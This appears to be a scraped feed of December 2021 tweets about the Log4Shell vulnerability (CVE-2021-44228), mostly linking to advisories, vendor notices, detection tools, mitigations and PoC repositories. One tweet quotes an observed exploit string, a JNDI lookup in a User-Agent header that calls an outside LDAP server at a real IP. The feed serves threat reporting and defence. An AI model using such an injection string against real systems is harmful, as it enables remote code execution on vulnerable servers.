2021-12-24 06:30:45「Apache Log4j」での遠隔からの任意コード実行の深刻な脆弱性(CVE-2021-44228)について https://t.co/xLMwGp58cO https://t.co/HAB9n1jgzW http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-24%2015%3A20 https://www.dreamnews.jp/press/0000250906/sec_trend
2021-12-24 06:20:20Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell https://t.co/vWr63kaomv https://github.com/aalex954/Log4PowerShell_r_netsec
2021-12-24 06:10:11「Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート」の内容を更新しました。 「Apache Log4jに関する解説 1.4版」… https://t.co/DjpxHfjg3c https://twitter.com/i/web/status/1474259091031998465intellilink_pr
2021-12-24 06:00:28Oracle Database and Apache log4j vulnerability CVE-2021-44228 and CVE-2021-45046 #tfa #ahf Trace File Analyzer (TF… https://t.co/rEAczgSLNY https://twitter.com/i/web/status/1474256925126631429AmbreKamlesh
2021-12-24 05:51:16.@FortiGuardLabs provides important updates about Apache #Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046, an… https://t.co/V1VO80eLWJ https://twitter.com/i/web/status/1474254918689173509mdfaridulalam
2021-12-24 05:40:27@nes2104 Goodnight, sleep tight, don’t let the CVE-2021-44228 Log4j exploit bitebabloidvevo
2021-12-24 05:12:00Log4j2 Vulnerability (CVE-2021-44228) Research and Assessment https://t.co/xxS9MjaDHs This blog relates to an ongoi… https://t.co/77emmHx6Qd https://databricks.com/blog/2021/12/23/log4j2-vulnerability-cve-2021-44228-research-and-assessment.html https://twitter.com/i/web/status/1474243866702147586DataAugmented
2021-12-24 05:11:37Zero Day Log4j Exploit ("Java-Logging Proof-of-Concept"). CVE-2021-44228 https://t.co/465BAEExQb https://t.co/FWomcEcRR0 https://think.unblog.ch/zero-day-log4j-luecke-pruefen-cve-2021-44228/THINKTANKUNBLOG
2021-12-24 04:20:31結構な数の攻撃がきている感じですかね、/Apache Log4j2のRCE脆弱性(CVE-2021-44228)への攻撃と検知状況(2021/12/20状況) https://t.co/cfBydXLQX5 https://www.shadan-kun.com/blog/measure/8339/saitolab_org
2021-12-24 04:10:28I am begging you, especially anyone who has had to do ANY work handling incidents around CVE-2021-44228 &amp; friends:… https://t.co/8nd4s77eiY https://twitter.com/i/web/status/1474230174409322499ElleArmageddon
2021-12-24 04:00:14"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeEb9z Via @PandoraFMS. https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-24 02:50:16Apache Log4j2 のセキュリティ速報 (CVE-2021-44228) の更新情報 https://t.co/zNTIBuwlmF V2で止まってた邦訳がV6まで来てます!待ってたー。 https://aws.amazon.com/jp/security/security-bulletins/AWS-2021-006/tsukamoto
2021-12-24 02:50:12概要に脆弱性を狙った攻撃手法や検知状況に関するリンクを追加しました。また、「SIDfm の監視対象製品への影響」に製品情報を追加・更新しました。(2021年12月24日) Apache Log4j CVE-2021-44228… https://t.co/H2g38pEDHM https://twitter.com/i/web/status/1474210402183843840softek_jp
2021-12-24 02:40:07Find out about SAP HANA XSA log4j CVE-2021-44228 ▶️ https://t.co/d2rV5H5LYD https://t.co/rsvag43thZ http://sap.to/6014Ja9tiSAPdevs
2021-12-24 02:12:11https://t.co/nND27OcMtZ The ASF quickly provided a fix to address CVE-2021-44228 in Apache Log4j 2.15, but on T… https://t.co/wpCzPpv5JS https://adtmag.com/articles/2021/12/15/log4j-vulnerability.aspx https://twitter.com/i/web/status/1474199371105193985eagerbeavertech
2021-12-24 01:10:18The latest update for #Cloudsmith includes "All About Log4j/#Log4Shell + Mitigation (CVE-2021-44228 and Beyond)" an… https://t.co/xQI1EIna1g https://twitter.com/i/web/status/1474185245348052995opsmatters_uk
2021-12-24 00:01:30对Log4Shell CVE-2021-44228 应急响应 https://t.co/uItT2efzUX https://t.co/8BbfLJ5xdf https://ift.tt/3FpGjub https://ift.tt/33YWvEVbuaqbot
2021-12-23 23:12:05CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-23 23:11:59【VMware Japan Blog】VMware のWAF でApache Log4j の脆弱性対策してみた 2021年12月、Apache Log4j に深刻な脆弱性(CVE-2021-44228/CVE-2021-45046… https://t.co/KcZX3xIhhy https://twitter.com/i/web/status/1474152895503294471VMware_Japan
2021-12-23 23:10:26Apache Log4jの脆弱性(CVE-2021-44228)について NECの製品・OEM製品の対応状況についてまとめたサイト https://t.co/qxmEAS8Y4T https://www.support.nec.co.jp/View.aspx?NoClear=on&id=3010103719katsuny3
2021-12-23 22:50:42今週のブログは、12/11に #JPCERT/CC が注意喚起した、 #Apache #Log4j の任意コード実行の #脆弱性 (CVE-2021-44228) について書きました。 オープンソースかどうかにかかわらず、外部のラ… https://t.co/fQ31mNTaOE https://twitter.com/i/web/status/1474148310524968974crosslaboratory
2021-12-23 22:50:21.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/CjeX8qp8Jo https://twitter.com/i/web/status/1474148939901325312Woronka
2021-12-23 22:40:12@fr0zenprocess looks at the impact of the #Log4j vulnerability (CVE-2021-44228) in a K8s cluster &amp; how to prevent s… https://t.co/PoE7ikLj8i https://twitter.com/i/web/status/1474147663918481412tigeraio
2021-12-23 22:20:11An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/GZODDFIQRO https://twitter.com/i/web/status/1474141840714739713ProductCERT
2021-12-23 22:10:11Since the publication of CVE-2021-44228, 3 more vulnerabilities were published in #Log4j versions. For a list of af… https://t.co/xQ9nQTkBus https://twitter.com/i/web/status/1474139756925788162MedigateLtd
2021-12-23 22:10:05【お知らせ】 Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起に基づく、アンテナハウス社製品の対策について、対象製品と対策方法を公開しております https://t.co/JeaJcRMsdV https://www.antenna.co.jp/news/2021/system-apache-log4j.htmlAntennaInfo
2021-12-23 22:01:03The latest information on the Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations https://t.co/kDEn2OetHx https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/vAmyWagman
2021-12-23 22:00:15HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/qBh8a9Ztuh https://t.co/KAfB5gxnGm https://bit.ly/3FFmeAdChrisFranzTech
2021-12-23 20:30:13Log4J/Log4Shells Exploit Analysis (CVE-2021-44228) - Security Boulevard https://t.co/3cYlPV9V8s https://securityboulevard.com/2021/12/log4j-log4shells-exploit-analysis-cve-2021-44228/Caute_cautim
2021-12-23 19:52:55“With the attention CVE-2021-44228 has received, I wouldn’t be surprised if we saw a third CVE related to #Log4j2,”… https://t.co/Z9NqTECBB5 https://twitter.com/i/web/status/1474104392886349827valtixinc
2021-12-23 19:26:58Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/dr0FXZSO4J https://dy.si/oisu3L2dsimelka
2021-12-23 19:11:37Among many other things I have learned working to assess and mitigate risk associated with log4j CVE-2021-44228, I… https://t.co/RlJJxI6xd0 https://twitter.com/i/web/status/1474093741682089986wcbdata
2021-12-23 19:01:45CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) https://t.co/UOeeH89B4R via @YouTube https://youtu.be/7qoPDq41xhQZeNico13
2021-12-23 18:54:06.@manageengine does not include OpManager AppManager on their list of products affected by log4j CVE-2021-44228. L… https://t.co/zYgF9k6a32 https://twitter.com/i/web/status/1474088516430839814VolanteVolpe
2021-12-23 18:32:00PowerChuteTM Business Edition v10.0 における Apache Log4j の脆弱性対策について(CVE-2021-44228) https://t.co/v3raXYsJCM https://jpn.nec.com/esmpro_um/pcbe_log4j2.pdfURKlabo
2021-12-23 18:22:26Apache Log4jにおける任意のコードが実行可能な脆弱性(CVE-2021-44228) JVNVU#96768815 : 富士通 https://t.co/lfloha8Top https://www.fujitsu.com/jp/products/software/resources/condition/security/vulnerabilities/2021/jvn-96768815.htmlURKlabo
2021-12-23 18:12:45log4j-scanner es un escáner de @CISAgov para identificar servicios afectados Log4Shell ✅ CVE-2021-44228 CVSS 10.0… https://t.co/Dqi78aeg2t https://twitter.com/i/web/status/1474077594857443340elhackernet
2021-12-23 17:52:11Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun… https://t.co/fIdzjmYSlz https://twitter.com/i/web/status/1474073971431776265feras_sahloul
2021-12-23 17:22:02The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/oGFTWTGv4i https://twitter.com/i/web/status/1474066646805401609jzupon
2021-12-23 17:13:35Log4j's security vulnerability (CVE-2021-44228) has been addressed. Specifically, we have updated the version of Ap… https://t.co/F506KohECD https://twitter.com/i/web/status/1474062263548096520Live2D
2021-12-23 17:13:21In addition to CVE-2021-44228, CVE-2021-45105 is also fixed in the latest version 2.17.0. Please be assured that th… https://t.co/iFaQgtogtu https://twitter.com/i/web/status/1474062266371031040Live2D
2021-12-23 17:13:10🚨 Important 🚨 Please note that Ballerina and Ballerina Central are NOT affected by the “Log4Shell” (CVE-2021-44228… https://t.co/b0zqlq2he6 https://twitter.com/i/web/status/1474062343005159426ballerinalang
2021-12-23 17:12:59Have you heard about the new critical vulnerability CVE-2021-44228 ( #Log4Shell )? Using #log4j2 in your #webapp? G… https://t.co/w13JpHYt5S https://twitter.com/i/web/status/1474062348516311045tomitribe
2021-12-23 17:12:36🍿 Watch @ericsmalling demonstrate an RCE against the #Log4Shell / CVE-2021-44228 vulnerability on a PoC #Java EE ap… https://t.co/Pm0igJks8S https://twitter.com/i/web/status/1474062392174817286snyksec
2021-12-23 17:11:29The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/i7opHHB0Bs https://twitter.com/i/web/status/1474062558395080718velez1066
2021-12-23 17:10:32Log4j RCE CVE-2021-44228 Exploitation Detection #Cybersecurity #security https://t.co/759ER1dT8Q https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860bcybersecboardrm
2021-12-23 17:00:38Actualización 4: Actividad en la red para la explotación de la vulnerabilidad Log4J (CVE-2021-44228). Os dejamos la… https://t.co/274YlCefnc https://twitter.com/i/web/status/1474060013345906695WSG127
2021-12-23 16:40:13Log4j Vulnerability (Log4Shell) Explained by LiveOverFlow // CVE-2021-44228 https://t.co/7s4N8GtodU https://youtu.be/w2F67LbEtnkshakuganz_
2021-12-23 15:03:58py4jshell: code to simulate the Log4j Remote Code Execution (RCE) CVE-2021-44228 vulnerability in a Flask web serve… https://t.co/4WWPv2r8ka https://twitter.com/i/web/status/1474030853521092609fullstackpython
2021-12-23 14:31:34Nice visualisation of how #log4j JNDI vulnerabilities (CVE-2021-44228) can be exploited, with several good pointers… https://t.co/2OPimNvFB8 https://twitter.com/i/web/status/1474022210717327365itworks
2021-12-23 14:30:26The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/IYKkrgTNq5 https://twitter.com/i/web/status/1474024246510866437velez1066
2021-12-23 14:30:14The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/tm173tpgwt https://twitter.com/i/web/status/1474024364668510211velez1066
2021-12-23 14:12:55Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 1.3M (audience size) CVE-2021-45046: 842.3K CVE-2021-4… https://t.co/gfXGjG1qhC https://twitter.com/i/web/status/1474016954730041352CVEtrends
2021-12-23 14:12:24MàJ schéma log4j pour Java 6 ! https://t.co/v1Fpc5TtE7 CVE-2021-44228 #Log4Shell #ApacheLog4j #log4j2 https://t.co/ObkK7bOu6c http://secu.si/2021/12/log4shell/janiko71
2021-12-23 14:12:03M back to work today, after a long break...🤪🤪 Researched on Log4J (CVE-2021-44228- The Internet Sensation)😎🤑… https://t.co/DiIhJxdrDN https://twitter.com/i/web/status/1474017323119833096s4ksh1
2021-12-23 14:00:08Please rest assured that Teltonika Networks products are not #vulnerable to the CVE-2021-44228 exploit as our netwo… https://t.co/LshY1b0lTG https://twitter.com/i/web/status/1474016951919792130TeltonikaNET
2021-12-23 13:40:21Threat Analysis: #log4shell (CVE-2021-44228), a new vulnerability that is incredibly simple to exploit, provides th… https://t.co/JufSxKU4WC https://twitter.com/i/web/status/1474010059088830470ReaQta
2021-12-23 13:30:48Demo: Detecting &amp; Preventing Log4Shell (CVE-2021-44228) with NSX-T 3.2... https://t.co/NrDMhSJ6I8 https://dy.si/qTAr4GVerbeyst
2021-12-23 13:10:46It's been 2 weeks since CVE-2021-44228 (aka Log4Shell) was disclosed. The vulnerability is being actively exploited… https://t.co/69a4SlQzBI https://twitter.com/i/web/status/1474003818203561985threatnix
2021-12-23 12:52:31Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/IKzxHjXEmx https://dy.si/m5Q36unachogon_
2021-12-23 11:50:10Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 https://t.co/6HCK6xUqvf https://eshielder.com/2021/12/23/threat-intelligence-and-protections-update-log4shell-cve-2021-44228/eshieldsecure
2021-12-23 11:00:21Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 #Cybersecurity #security via… https://t.co/o02o0hJrpF https://twitter.com/i/web/status/1473966904536674309MnkeniFrancis
2021-12-23 10:21:59Mitigating Log4Shell and Other Log4j-Related Vulnerabilities https://t.co/647ZIgAdtf CVE-2021-44228 CVE-2021-4504… https://t.co/YfSLhFqHq2 https://www.cisa.gov/uscert/ncas/alerts/aa21-356a https://twitter.com/i/web/status/1473960349883850752vulmoncom
2021-12-23 10:13:51オミクロン株とLog4j(CVE-2021-44228)だったらどちらが怖いか…というとどっちも怖いな… 担当者が年末を迎えられるか、年末に誰にも会えないか、という視点では同じなのかもしれないけど(つらい)… https://t.co/pHBHSAA9Ig https://twitter.com/i/web/status/1473957438949031941o_ob
2021-12-23 09:42:18Even as the response and cleanup from Log4Shell (CVE-2021-44228) continues, we can learn from what happened and eme… https://t.co/vDbLzUQYLj https://twitter.com/i/web/status/1473949019739144197F5Labs
2021-12-23 09:31:24Is Your Web Application Exploitable By Log4Shell (CVE-2021-44228) Vulnerability? | Qualys Security Blog https://t.co/q42CYRiNnQ https://blog.qualys.com/vulnerabilities-threat-research/2021/12/15/is-your-web-application-exploitable-by-log4shell-cve-2021-44228-vulnerabilityPVynckier
2021-12-23 09:12:16Log4jの脆弱性問題(CVE-2021-44228)に対応しました。 具体的な対処として、Cubism Editorで使用しているApache Log4jのバージョンを脆弱性対策がされている最新バージョン2.17.0に更新しました。(1/3) #Live2DLive2D
2021-12-23 09:12:03最新バージョン2.17.0では、CVE-2021-44228に加え、CVE-2021-45105にも対応しています。 CVE-2021-45105の脆弱性については、現在までのCubism Editorのバージョンでは発生しませんのでご安心ください。(2/3) #Live2DLive2D
2021-12-23 09:11:54Cubism Editor 4.1.03以前のバージョンをお使いの方でApache Log4jの脆弱性(CVE-2021-44228)に対応する方法についてはヘルプサイトををご覧ください。(3/3) ■ヘルプサイト… https://t.co/vYM44Q3Qsa https://twitter.com/i/web/status/1473941521254735872Live2D
2021-12-23 08:40:10Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/n70yO9WCNH https://youtu.be/0-abhd-CLwQremm_roman
2021-12-23 08:31:27Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 | McAfee Blogs https://t.co/QlyddCMMIS https://www.mcafee.com/blogs/enterprise/threat-intelligence-and-protections-update-log4shell-cve-2021-44228/Secnewsbytes
2021-12-23 08:31:11Apache Log4j2に関する情報を弊社のオウンドメディア「CyberSecurityTIMES」に掲載いたしました。 ■Apache Log4j2のRCE脆弱性(CVE-2021-44228)への攻撃と検知状況(2021/… https://t.co/p6bXqN6w5a https://twitter.com/i/web/status/1473933145062113282CSC_JP
2021-12-23 07:54:46Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/WIuZdYP0jc https://dy.si/X6bsdgcinier
2021-12-23 07:51:49Apache Log4j vulnerability CVE-2021-44228 is a critical zero-day code execution vulnerability, the Internet was set… https://t.co/Rl5BZgIIA8 https://twitter.com/i/web/status/1473919006465826816CswWorks
2021-12-23 07:40:26Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/EugO1H5iOe https://dy.si/ZBQJiStefanicAndrej
2021-12-23 07:37:06「SIDfm の監視対象製品への影響」に製品情報を追加・更新、製品情報をソートしました。(2021年12月23日) Apache Log4j CVE-2021-44228 (Log4Shell) の影響有無リスト | SIDfm… https://t.co/KSocUYzmyf https://twitter.com/i/web/status/1473916839394971651softek_jp
2021-12-23 07:23:46Using NSX IDS/IPS to protect against CVE-2021-44228 Log4Shell Vulnerability https://t.co/OU4laA2KEa https://dy.si/PUCpfR2MarcHuppert
2021-12-23 07:20:19Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/uiXadAY0Dd https://dy.si/VBhcue2scandaletti
2021-12-23 07:16:19CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-23 07:15:37📍AWSアカウントを「Log4Shell」で乗っ取る方法が報告される 📝JavaのLog4jライブラリに存在していたリモートコード実行を可能にする脆弱性「CVE-2021-44228(Log4Shell)」を突いてAWSアカウン… https://t.co/T2pvE5l7QO https://twitter.com/i/web/status/1473911571810238469ChoNewsHDK
2021-12-23 07:14:07Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/DRlvV0sxVW https://dy.si/FgidA12deepaksekhar
2021-12-23 06:42:28The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/pqFbjkx0zp https://t.co/G5u5DJlrbA https://bit.ly/3qkUUR9BilekSimon
2021-12-23 06:21:16IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community · GitHub https://t.co/bWm46bO35p https://gist.github.com/blotus/f87ed46718bfdc634c9081110d243166Secnewsbytes
2021-12-23 06:10:445 Things We’ve Learned About CVE-2021-44228 https://t.co/JUuzqMeCxT #ImpervaResources https://www.imperva.com/blog/5-things-weve-learned-about-cve-2021-44228/chulbul_deepu
2021-12-23 05:22:33Apache SkyWalking Log4Shell Poc (CVE-2021-44228) https://t.co/GkMkHa8Klw #Log4j2 #Apache #Log4Shell https://t.co/jMy8USPdrL https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j/App/Apache-SkyWalkingcckuailong
2021-12-23 04:01:23Malicious cyber actors are actively scanning networks to potentially exploit CVE-2021-44228 (known as “#Log4Shell”)… https://t.co/poXTANio7H https://twitter.com/i/web/status/1473864229769957378dynamicCISO
2021-12-23 04:00:53[ばばさん通信ダイジェスト] 賛否関わらず話題になった/なりそうなものを共有しています。 Apache Log4j2 Issue (CVE-2021-44228) https://t.co/TEia6TWFcC https://ift.tt/3dEhEWinetmarkjp
2021-12-23 04:00:28The latest update for #CFEngine includes "Hunting and tracking remediation of #Log4Shell (CVE-2021-44228)" and "Sec… https://t.co/aAXzcPm5fZ https://twitter.com/i/web/status/1473865668009332737opsmatters_uk
2021-12-23 04:00:10"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeEb9z Via @PandoraFMS. https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-23 03:50:30更新:Apache Log4j の脆弱性対策について(CVE-2021-44228)(IPA 最終更新日:2021年12月23日) https://t.co/5dCFVOlIou https://www.ipa.go.jp/security/ciadr/vul/alert20211213.htmlJPACofficial
2021-12-23 03:10:16MongoDBにおけるLog4Shell(CVE-2021-44228)の影響について #MongoDB #CVE202144228 #log4j - https://t.co/Llsi452uov https://www.creationline.com/lab/47538creationline
2021-12-23 01:44:46&gt; Xcode contains a copy of the log4j library that has the CVE-2021-44228 security vulnerability. Xcode automaticall… https://t.co/8OCjqvkwc5 https://twitter.com/i/web/status/1473828440063488001the_uhooi
2021-12-23 01:41:29こんにちは。SBTブログに【Apache Log4j 2の脆弱性(CVE-2021-44228)への Imperva 社の対応について】を公開しました。2021/12/9に、Java 言語のロギングライブラリ「Log4J 2」にゼ… https://t.co/GaZPpsXpJV https://twitter.com/i/web/status/1473829811630272517SBTechCorp
2021-12-23 01:40:28If you're looking for more info on the Log4Shell CVE-2021-44228 vulnerability, check out our Situational Awareness… https://t.co/SJ6pUfxnme https://twitter.com/i/web/status/1473830469083054086SumoLogic
2021-12-23 01:30:49Investigating a Log4j Malware Attack (CVE-2021-44228) https://t.co/1lvWTwdeKs via @YouTube https://youtu.be/49BLeUy3DL84NY4SCII
2021-12-23 01:22:42What is CVE-2021-44228 or Log4Shell? In short, it allows an attacker to take control of a server. Here's what you n… https://t.co/rKqWho9NW0 https://twitter.com/i/web/status/1473824428941262853MirantisIT
2021-12-23 01:11:53This is a reasonable video on the latest security issue. Hackers vs. Developers // CVE-2021-44228 Log4Shell… https://t.co/BTZWyUJxbn https://twitter.com/i/web/status/1473821606434775041codewizard58
2021-12-23 01:00:09At the moment, this sample[1] is detected as CVE-2021-44228. But it's just a java stager. Don't forget about FP.… https://t.co/tKtP2JeYhC https://twitter.com/i/web/status/1473820537340190729r3dbU7z
2021-12-23 00:03:57Log4J/Log4Shells Exploit Analysis (CVE-2021-44228) #infosec #infosecurity #cybersecurity #threatintel… https://t.co/e9FqPaHmRb https://twitter.com/i/web/status/1473804627258789896CyberIQs_
2021-12-22 23:53:38사용되는 Apache Log4j 버전 확인하시고 반드시 최신으로 업그레이드 하세요! #log4j보안취약점 #Log4j_cve_security_vulnerabilities CVE-2021-44228 CVE-2… https://t.co/mCEwUfLbH2 https://twitter.com/i/web/status/1473801994510868482tedwon
2021-12-22 23:34:10Example CVE-2021-44228 payload: User agent: ${jndi:ldap://142.93.172.227:1389/Exploit} Source IP: 77.37.134.80 (… https://t.co/kVgdGWUG3j https://twitter.com/i/web/status/1473796392892067840bad_packets
2021-12-22 23:26:12Apache Log4j 問題(CVE-2021-44228)に関して #GoogleCloud のSecurity Advisoryのページが継続的にかなり更新されていて、全サービスについて影響有無や、影響がある場合の対策の進捗… https://t.co/P9T59r9ShA https://twitter.com/i/web/status/1473794982381334531twtko
2021-12-22 23:01:12Un avis a été mis à jour : "SSA-661247: Apache #Log4j Vulnerabilities (#Log4Shell CVE-2021-44228, CVE-2021-45046) -… https://t.co/xcX4iXlqcj https://twitter.com/i/web/status/1473788782432464901HaboubiAnis
2021-12-22 22:53:08.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/ec77hVl0Rj https://twitter.com/i/web/status/1473786500433297418Woronka
2021-12-22 22:40:53An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/31szzOSJdi https://twitter.com/i/web/status/1473784586165530624ProductCERT
2021-12-22 22:23:40log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/7cmQzgWfO1 https://twitter.com/i/web/status/1473778076886904835ptracesecurity
2021-12-22 22:20:10#HCL #Knowledgebase CVE-2021-44228 + CVE-2021-45046 + CVE-2021-45105, Log4J 2 / Log4Shell Security Advisory for Not… https://t.co/C3vyJ8QUT7 https://twitter.com/i/web/status/1473780311414738955domino_robot
2021-12-22 21:40:50The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/dVgClCs10L https://twitter.com/i/web/status/1473765541949186054jzupon
2021-12-22 21:22:52The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/3hOiz7qo8n https://t.co/VYsNcoQhOU https://bit.ly/3piC1z4joanndoan
2021-12-22 21:11:41Итоги 2021 😂 Log4shell CVE-2021-44228 Apache Path Traversal CVE-2021-41773 PrintNightmare CVE 2021-34527 Baron Sam… https://t.co/W414qEGoCn https://twitter.com/i/web/status/1473761825120571396gebutcher
2021-12-22 21:00:18#Log4j - A Detailed Guide on Penetration Testing Source: https://t.co/H4oplEAkOn CVE-2021-44228 #Hacking #infosec… https://t.co/xtH8yHAim1 https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/ https://twitter.com/i/web/status/1473760255452622856FragmentedSoul5
2021-12-22 20:56:24Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 - https://t.co/nKzQaxjKST https://www.mcafee.com/blogs/enterprise/threat-intelligence-and-protections-update-log4shell-cve-2021-44228/ka0com
2021-12-22 20:55:40Latest Research &amp; Insights on CVE-2021-44228 AKA LOG4SHELL | Tenable® https://t.co/mU87y5V0pr https://www.tenable.com/log4j?utm_campaign=00023584&utm_promoter=tenable-ops&utm_medium=homepage-hero&utm_content=other-rr-log4j-lp&utm_source=tenable-dot-comSecopsgeek
2021-12-22 20:41:49Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-22 20:37:26New Joint Cyber Security Advisory on Apache Log4j (CVE-2021-44228) from @CISAgov @NSACyber @FBI @ASDGovAu @cse_cst… https://t.co/v1VpGOhHef https://twitter.com/i/web/status/1473750244907225091PaulRobichaud
2021-12-22 20:33:53AMD is still analyzing CVE-2021-44228 impact, says none of its products are affected by the Log4shell vulnerability. https://t.co/glWo978ope https://twitter.com/BleepinComputer/status/1473680774977236999serghei
2021-12-22 20:10:14The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/RDqpNzNxz1 https://twitter.com/i/web/status/1473747529187614727RTocaxelli
2021-12-22 20:01:39Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 #infosec #infosecurity #cybersecurity… https://t.co/HXoeJyuRin https://twitter.com/i/web/status/1473744319551004691CyberIQs_
2021-12-22 19:53:42Threat Intelligence and Protections #Update Log4Shell CVE-2021-44228, by Mo Cashman https://t.co/ebCEiB7Yzm #McAfeeLabs https://www.mcafee.com/blogs/enterprise/threat-intelligence-and-protections-update-log4shell-cve-2021-44228/SecurityNewsbot
2021-12-22 19:41:14NSX-T 3.1.3.5 update is out. Fixed Issue: Updated Apache Log4j to version 2.16 to resolve CVE-2021-44228 and CVE-… https://t.co/QiQVjiFbxg https://twitter.com/i/web/status/1473739388609773572daunce_
2021-12-22 19:40:22https://t.co/T5almATHWa will find Log4shell vulnerability (CVE-2021-44228) ... If you add a checker for it. Solutio… https://t.co/91ICd5PCXF http://Scanmycode.today https://twitter.com/i/web/status/1473739604524158983marcinguy
2021-12-22 19:22:36Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued https://t.co/QRhn1InX79 https://bit.ly/3pjlsTuappperfeng
2021-12-22 19:22:172021: Log4shell CVE-2021-44228 Apache Path Traversal CVE-2021-41773 PrintNightmare CVE 2021-34527 Baron Samedit CVE… https://t.co/0vZBAPHcaZ https://twitter.com/i/web/status/1473734385866264577faradaysec
2021-12-22 19:12:24McAfee | Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 https://t.co/Jd4TUNPJ3C https://bit.ly/3Eq82JzStopMalvertisin
2021-12-22 19:00:14Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/LvhCs4D1lb https://dy.si/oQewNNtonyabenstock
2021-12-22 18:40:23Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 https://t.co/lpB08h3Y9J https://www.itsecuritynews.info/threat-intelligence-and-protections-update-log4shell-cve-2021-44228/IT_securitynews
2021-12-22 18:40:19Une vulnérabilité critique a été découverte dans le projet Apache log4j (CVE-2021-44228). Les produits et services… https://t.co/IUdIvlWdEh https://twitter.com/i/web/status/1473723750201896971Devolutionsfr
2021-12-22 18:40:13Menace Intelligence and Protections Replace Log4Shell CVE-2021-44228 https://t.co/YCDKGaLcq7 https://newsaxes.com/menace-intelligence-and-protections-replace-log4shell-cve-2021-44228/newsaxes
2021-12-22 18:31:23CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-22 18:31:18@KrollWire is helping several clients and organizations with CVE-2021-44228, the Log4j vulnerabilities, and we've p… https://t.co/waTS7JqADN https://twitter.com/i/web/status/1473721554974425093FrankMarano6
2021-12-22 18:31:12Here's how Asgardeo responded to Log4j2 zero-day vulnerability (CVE-2021-44228). Recapping our 3 day risk mitigatio… https://t.co/Fexqgpkx6w https://twitter.com/i/web/status/1473722515100946444asgardeo
2021-12-22 18:17:09#FortiGuardLabs provides important updates about Apache #Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046, and… https://t.co/sDDHYxbXlq https://twitter.com/i/web/status/1473715210598948869FortiGuardLabs
2021-12-22 18:01:00Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration… https://t.co/8vVBUT3AwT https://twitter.com/i/web/status/1473713085508722688steiner254
2021-12-22 17:53:44Une faille critique (CVE-2021-44228) d’exécution de code arbitraire à distance (RCE) dans Apache Log4j constitue un… https://t.co/tNKqN5WBAV https://twitter.com/i/web/status/1473711437143060488t2bertucat
2021-12-22 17:36:57Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/fV4IUbJAwj https://dy.si/scHeCvcdx001
2021-12-22 17:22:32Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/D01VXfrcdZ https://dy.si/HwUYwpscandaletti
